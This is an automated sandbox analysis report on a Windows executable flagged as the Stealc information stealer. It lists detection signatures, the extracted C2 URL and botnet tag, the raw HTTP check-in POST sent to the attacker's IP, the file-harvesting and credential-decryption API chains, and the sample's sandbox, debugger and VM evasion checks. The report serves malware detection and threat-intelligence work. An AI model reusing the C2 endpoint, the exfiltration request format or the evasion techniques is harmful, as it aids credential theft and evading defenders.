Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532351
MD5:cfdd8a903441555e23417125bccc4e60
SHA1:5ee09d72d09a587d1399d651d5e2d3e199899ae3
SHA256:51104c217fb4ac57c1ef1071eaf80c801e17a2ca4c1b83a31d2d7a43b5f22671
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CFDD8A903441555E23417125BCCC4E60)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6960JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6960JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.260000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T01:29:11.939162+020020442431Malware Command and Control Activity Detected192.168.2.449732185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.260000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0026C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00267240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00267240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00269AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00269AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00269B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00269B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00278EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00278EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00274910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00274910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0026DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0026E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0026ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00274570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00274570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0026DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0026BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00273EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00273EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0026F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002616D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 42 35 32 41 45 41 36 30 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="hwid"D8B52AEA60BD3120641781------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="build"doma------DBKFIDAAEHIEGCBFIDBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00264880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00264880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 42 35 32 41 45 41 36 30 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="hwid"D8B52AEA60BD3120641781------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="build"doma------DBKFIDAAEHIEGCBFIDBF--
                Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1800007747.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800007747.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1800007747.0000000000E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3S
                Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/n
                Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37D~f

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006270060_2_00627006
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006219AB0_2_006219AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006282360_2_00628236
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072D2F20_2_0072D2F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061FAD50_2_0061FAD5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005762920_2_00576292
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00607A900_2_00607A90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00624B290_2_00624B29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006323190_2_00632319
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629CD60_2_00629CD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DD5C80_2_004DD5C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C66C0_2_0061C66C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061BE2C0_2_0061BE2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E369F0_2_004E369F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062BE930_2_0062BE93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C5F470_2_005C5F47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00622FF40_2_00622FF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061DFCA0_2_0061DFCA
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 002645C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: nlvthzrj ZLIB complexity 0.9947395752257161
                Source: file.exe, 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00279600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00273720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00273720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\F0HPVKVL.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1801216 > 1048576
                Source: file.exeStatic PE information: Raw size of nlvthzrj is bigger than: 0x100000 < 0x191800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.260000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nlvthzrj:EW;juspdwth:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nlvthzrj:EW;juspdwth:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00279860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c4681 should be: 0x1badc6
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nlvthzrj
                Source: file.exeStatic PE information: section name: juspdwth
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BD860 push eax; mov dword ptr [esp], edi0_2_006BD8AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0027B035 push ecx; ret 0_2_0027B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B4858 push ecx; mov dword ptr [esp], eax0_2_006B4878
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070A836 push 523A8313h; mov dword ptr [esp], esi0_2_0070A918
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070A836 push 1D1ECA00h; mov dword ptr [esp], edx0_2_0070A925
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070A836 push 12552C1Ah; mov dword ptr [esp], esi0_2_0070B136
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B6024 push eax; mov dword ptr [esp], ebp0_2_006B6041
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push eax; mov dword ptr [esp], ebx0_2_0062716A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 43EA138Ah; mov dword ptr [esp], edi0_2_006271F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push esi; mov dword ptr [esp], 02A10ACDh0_2_00627231
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 58266091h; mov dword ptr [esp], eax0_2_00627256
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 7DC8E1F5h; mov dword ptr [esp], edx0_2_00627269
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push eax; mov dword ptr [esp], 39E7C1ABh0_2_00627292
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push edx; mov dword ptr [esp], eax0_2_00627327
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push eax; mov dword ptr [esp], 3C5535C0h0_2_006273E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 5148EF93h; mov dword ptr [esp], eax0_2_00627408
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push esi; mov dword ptr [esp], eax0_2_00627452
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push ebx; mov dword ptr [esp], edx0_2_0062749A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push ecx; mov dword ptr [esp], edx0_2_0062750E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push edi; mov dword ptr [esp], 36BD5483h0_2_00627515
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push esi; mov dword ptr [esp], ecx0_2_0062758A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push ecx; mov dword ptr [esp], edi0_2_006275AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push esi; mov dword ptr [esp], edx0_2_00627723
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 516FF8D7h; mov dword ptr [esp], eax0_2_0062773A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 3E0E5C60h; mov dword ptr [esp], ebx0_2_00627771
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push edx; mov dword ptr [esp], 7B7F87C4h0_2_006277AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 732F8736h; mov dword ptr [esp], eax0_2_006277D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push ebp; mov dword ptr [esp], 7F32B85Ch0_2_00627883
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 00BC7466h; mov dword ptr [esp], eax0_2_006278E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push edi; mov dword ptr [esp], 50F4E59Bh0_2_0062790C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627006 push 086C67DAh; mov dword ptr [esp], edi0_2_0062792B
                Source: file.exeStatic PE information: section name: nlvthzrj entropy: 7.953408451979988

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00279860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13496
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636ECA second address: 636EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 jmp 00007F46B8B98B0Ah 0x0000000e jmp 00007F46B8B98B0Ah 0x00000013 jl 00007F46B8B98B0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6371DB second address: 6371E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6371E7 second address: 6371EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637363 second address: 637367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637498 second address: 6374A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6374A2 second address: 6374BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6374BF second address: 6374C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6374C3 second address: 6374E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F46B8DCA19Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637665 second address: 63766B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
